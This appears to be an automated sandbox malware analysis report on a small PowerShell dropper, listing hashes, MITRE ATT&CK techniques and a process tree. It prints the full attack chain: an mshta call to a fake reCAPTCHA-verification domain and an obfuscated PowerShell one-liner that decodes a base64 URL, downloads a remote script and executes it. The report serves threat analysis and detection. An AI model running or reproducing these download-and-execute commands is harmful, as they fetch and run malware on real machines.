cd1dab4f48894954a1c3fec77cb8af692a49853cb7b0c748021bbecbec8496c1

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-12-2024 17:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.ps1
Size

98B
MD5

f06b8028feb204bc56013b2f961ea80c
SHA1

8d5eeee9730fcd09b7e46b566d00b28458405457
SHA256

cd1dab4f48894954a1c3fec77cb8af692a49853cb7b0c748021bbecbec8496c1
SHA512

fbc4f28323c80ccd2faf9030aefecb47846aa379df61f6bcbcaf093691669f375cfcb09a519969d16e0e3b88faf5baaa0538faf3695c95595d501f3839bedc76

Score

10^/10

execution

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://recaptha-verify-8u.pages.dev

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://polovoiinspektor.shop/secure/login.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2264	mshta.exe
7	2264	mshta.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2632	powershell.exe
2588	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2588	powershell.exe
2632	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2588 wrote to memory of 2264	2588	powershell.exe	31
PID 2588 wrote to memory of 2264	2588	powershell.exe	31
PID 2588 wrote to memory of 2264	2588	powershell.exe	31
PID 2264 wrote to memory of 2632	2264	mshta.exe	33
PID 2264 wrote to memory of 2632	2264	mshta.exe	33
PID 2264 wrote to memory of 2632	2264	mshta.exe	33

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588
- C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" https://recaptha-verify-8u.pages.dev
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e92b706ff0a2e9efd0a3915dda08eb2c

SHA1
361bfd8cd8528dec44eb1d955916176a38b07837

SHA256
f56ff1e568b3a1c0ec7835346dfab98e4b09e227635caf1523917784b0ad4606

SHA512
b8ab23f998e8f91b18e9467b44512369b5a448e787f71401a68f8f010d73bbdc7a80f3576696ced446296eac9bbdbb738b4b6dfba9be6477fcaf8cbb33ff1d6a

Download Submit
memory/2588-4-0x000007FEF67FE000-0x000007FEF67FF000-memory.dmp

Filesize
4KB

Download
memory/2588-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2588-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2588-7-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2588-8-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2588-9-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2588-10-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2632-30-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2632-31-0x0000000001E20000-0x0000000001E28000-memory.dmp

Filesize
32KB

Download